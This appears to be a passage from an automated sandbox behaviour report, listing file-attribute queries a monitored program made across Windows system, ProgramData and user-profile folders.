| Get Info | C:\Users\All Users\Adobe | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Desktop | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Favorites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft Help | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Mozilla | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Oracle | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Sun | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Contacts | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Cookies | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Desktop | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Downloads | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Favorites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Links | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Local Settings | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\My Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\NetHood | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\PrintHood | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Recent | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Saved Games | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Searches | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\SendTo | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Videos | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Desktop | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Documents | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Downloads | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Favorites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Libraries | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Recorded TV | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Videos | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.en | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.es | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-002C-0409-1000-0000000FF1CE}-C\Proof.fr | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\1033 | type = file_attributes |
|
4 | |
| Get Info | C:\MSOCache\All Users\{90140000-0117-0409-1000-0000000FF1CE}-C\Access.en-us | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\ARM\Reader_10.0.0 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\DSS | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\Keys | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\DRM\Server | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\eHome\logs | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Event Viewer\Views | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\MSDN\8.0 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\NetFramework\BreadcrumbStore | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Network\Connections | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Network\Downloader | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OFFICE\UICaptions | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\RAC\Outbound | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\RAC\PublishedData | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\RAC\StateData | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\RAC\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Search\Data | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\User Account Pictures\Default Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\AIT | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Caches | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\DeviceMetadataStore | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\DRM | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\GameExplorer | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Ringtones | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Sqm | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Templates | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\WER | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Definition Updates | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\LocalCopy | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Quarantine | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Support | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSScan | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\WwanSvc\Profiles | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Sun\Java\Java Update | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pYBMagiZk | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Videos | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VUI8dbs8a6E_sx | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Music\PTSeo8U3g | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Music\vY8SYTb | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\A0V0PHPNzfBYDIW3 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dlnFWX8-gis4AfHnlPs | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\lDO-fZKyN8HI5j | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\YqeM | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Videos\3m pibGalRLIOAUhZKN | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Adobe\Acrobat | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Adobe\ARM | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Assistance | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Crypto | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Device Stage | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\DeviceSync | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\DRM | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\eHome | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Event Viewer | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\IdentityCRL | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Media Player | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\MF | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\MSDN | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\NetFramework | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Network | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OFFICE | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\RAC | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Search | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\User Account Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Vault | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\VISIO | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows Defender | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\Windows NT | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Microsoft\WwanSvc | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Mozilla\logs | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{3c3aafc8-d898-43ec-998f-965ffdae065a} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{e52a6842-b0ac-476e-b48f-378a97a67346} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{e6e75766-da0f-4ba2-9788-6ea593ce702d} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{f325f05b-f963-4640-a43b-c8a494cdda0f} | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\All Users\Sun\Java | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Local | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\LocalLow | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\AppData\Roaming | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Documents\My Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Documents\My Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Documents\My Videos | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Favorites\Links | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Favorites\Microsoft Websites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Favorites\MSN Websites | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Default\Favorites\Windows Live | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Documents\My Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Documents\My Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Documents\My Videos | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Music\Sample Music | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Pictures\Sample Pictures | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Recorded TV\Sample Media | type = file_attributes |
|
4 | |
| Get Info | C:\Users\Public\Videos\Sample Videos | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Adobe\Acrobat\10.0\Replicate | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Assistance\Client\1.0 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\DSS\MachineKeys | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Event Viewer\Views\ApplicationViewsRootNode | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OFFICE\UICaptions\1036 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\OFFICE\UICaptions\3082 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Search\Data\Applications | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Search\Data\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\DeviceMetadataStore\en-US | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\DRM\Cache | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Sqm\Manifest | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Sqm\Sessions | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Sqm\Upload | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\Start Menu\Programs | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\WER\ReportArchive | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows\WER\ReportQueue | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Updates | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{D2B0B133-42ED-44D3-809A-46EBB62BA863} | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows Defender\Scans\History | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\ActivityLog | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\Common Coverpages | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\Inbox | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\Queue | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\SentItems | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Microsoft\Windows NT\MSFax\VirtualInbox | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\42D5BEC7DDFBD49E76467529CBC2868987BF8460\packages\Patch | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\packages\vcRuntimeMinimum_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\packages\vcRuntimeMinimum_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\packages\vcRuntimeAdditional_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\packages\vcRuntimeMinimum_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\packages\vcRuntimeAdditional_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\packages\vcRuntimeMinimum_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\packages\vcRuntimeAdditional_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\packages\vcRuntimeMinimum_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\packages\vcRuntimeAdditional_amd64 | type = file_attributes |
|
4 | |
| Get Info | C:\ProgramData\Package Cache\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\packages\vcRuntimeAdditional_x86 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Adobe | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Application Data | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Apps | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Deployment | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Google | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\History | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Microsoft Help | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Mozilla | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temp | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\Temporary Internet Files | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\VirtualStore | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Adobe | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Identities | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Macromedia | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Mozilla | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\-HqxMx4 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\c Dq5hcOVfh519j-9a\6SyWqeVc5yzr | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\9tRJy\lbiZNM0EI_XyLx1 DZ9 | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yG_UzdwPFgf0Q\fV5QjQ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Music\EQ8UuS6KEr\W8JKzPrZW | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\aW44WW0 Tu | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\4T8UAInZgSm4 N-5gj\sS212v32k5JqAk8yl | type = file_attributes |
|
4 | |
| Get Info | C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\Yrfr6\nAikDiB6TQqHeUWBw | type = file_attributes |
|
4 | |
